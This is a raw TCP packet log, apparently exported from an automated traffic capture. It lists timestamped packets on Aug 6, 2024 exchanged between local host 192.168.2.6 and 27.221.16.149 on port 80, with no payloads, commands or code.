                                                                                                                                    Aug 6, 2024 10:29:46.501605034 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.501635075 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.551881075 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984286070 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984308958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984328985 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984436989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984448910 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984457016 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984460115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984473944 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984496117 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984725952 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984743118 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984754086 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984766960 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984769106 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984786034 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984796047 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984806061 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984811068 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984823942 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984833002 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984836102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984848022 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984858990 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984858990 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984869957 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984882116 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.984882116 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984900951 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.984919071 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.985285044 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985296965 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985306978 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985317945 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985328913 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985337973 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985342026 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.985367060 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.985380888 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:46.985467911 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:46.985507965 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154325962 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154352903 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154366016 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154414892 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154426098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154438972 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154473066 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154503107 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154622078 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154634953 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154645920 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154673100 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154768944 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154784918 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154797077 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154808044 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154818058 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154822111 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154829979 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154840946 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154843092 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154854059 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154864073 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154865026 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.154884100 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.154905081 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.155684948 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155697107 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155706882 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155734062 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.155823946 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155834913 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155846119 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.155869007 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.155881882 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495338917 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495362043 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495378017 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495389938 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495402098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495414972 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495428085 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495440006 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495454073 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495517969 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495619059 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495707989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495764971 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495837927 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495850086 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495874882 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495887041 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495901108 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495907068 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.495946884 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.495987892 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.496000051 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.496012926 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.496028900 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.496056080 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.497320890 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497366905 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497378111 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497437954 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.497443914 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497456074 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497468948 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497482061 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497483015 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.497497082 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.497510910 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.497554064 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812287092 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812299967 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812311888 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812330008 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812340021 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812345982 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812356949 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812391043 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812405109 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812454939 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812521935 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812689066 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812700033 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812711954 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812724113 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812736034 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812737942 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812747955 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812753916 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812776089 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812814951 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812827110 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812839031 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.812858105 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.812875986 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.813617945 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813630104 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813637018 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813669920 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813673973 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.813704967 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813709974 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.813715935 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.813752890 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.814095974 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.814109087 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.814145088 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:47.904671907 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:47.958136082 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.145427942 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145570993 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145582914 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145589113 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145622969 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145637989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145642996 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.145651102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145679951 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.145745039 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145759106 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145771027 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145782948 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145792007 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.145796061 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.145813942 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.145869970 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.146476984 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146488905 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146501064 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146513939 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146528006 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.146564007 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.146933079 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146945953 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146958113 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.146981001 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.147000074 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147011995 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147026062 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147037983 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147044897 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.147068977 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.147257090 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147268057 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147274971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147353888 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.147741079 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147752047 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147764921 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.147788048 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.192502022 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.238547087 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.286226034 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490374088 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490387917 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490402937 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490493059 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490495920 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490504980 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490516901 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490530014 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490549088 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490557909 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490565062 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490571022 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490581036 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490595102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490607977 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.490611076 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490628004 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490653992 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.490999937 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491167068 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491185904 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491199017 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491210938 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491211891 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491247892 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491386890 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491399050 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491410971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491434097 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491446018 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491466045 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491478920 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491496086 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491533041 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491563082 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491578102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491589069 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491600037 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.491607904 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.491631985 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.492273092 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492320061 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.492321968 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492341042 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492353916 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492373943 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492379904 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.492384911 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.492420912 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836314917 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836343050 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836354971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836381912 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836394072 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836405993 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836419106 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836427927 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836462021 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836467028 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836473942 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836496115 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836539984 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836550951 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836563110 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836575031 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836577892 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836589098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836606026 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836622000 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836819887 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836831093 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836842060 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836853981 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836865902 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836877108 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836882114 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836894989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836911917 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836914062 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836925983 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836934090 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836940050 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836952925 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836958885 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836965084 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836976051 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836987019 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.836987972 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.836999893 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.837013006 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.837017059 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.837027073 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:48.837030888 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:48.837071896 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:49.140074015 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140098095 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140108109 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140166998 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140180111 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140221119 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:49.140259981 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140263081 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:49.140300989 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:49.140330076 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140341997 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140352964 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:49.140384912 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:49.140526056 CEST804975127.221.16.149192.168.2.6
